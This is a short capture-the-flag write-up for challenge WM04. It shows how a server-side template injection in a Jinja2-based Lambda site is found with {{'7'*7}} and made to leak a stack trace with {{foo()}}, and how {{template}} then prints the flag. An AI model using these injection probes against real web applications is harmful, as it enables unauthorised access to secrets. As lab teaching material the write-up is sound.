WM04 - 250pts


Visit the Italian dish suggestion site at https://cfta-wm04.allyourbases.co and find a way to get the flag.


  1. Try SSTI (Server Side Template Injection) with {{'7'*7}}, which outputs 7777777 so the script is vulnerable. Note that editing and sending these requests is much easier using Burp Suite's repeater (intercept a request and right click then choose "Sent to repeater").

  2. Crash the script with {{foo()}} to get a stacktrace:

     File "/var/task/lambda_function.py", line 42, in lambda_handler
         'body': handle(event)
     ", "  File "/var/task/lambda_function.py", line 34, in handle
         msg = Template(template).render(dir=dir, help=help, locals=locals, globals=globals, template=flag)
     ", "  File "/var/task/jinja2/environment.py", line 1090, in render
     ", "  File "/var/task/jinja2/environment.py", line 832, in handle_exception
     ", "  File "/var/task/jinja2/_compat.py", line 28, in reraise
         raise value.with_traceback(tb)
     ", "  File "<template>", line 2, in top-level template code
  3. There is a template variable passed to the render function for the template. Let's send a request for {{template}} to print the contents of the template/flag variable. This shows the flag.



Last updated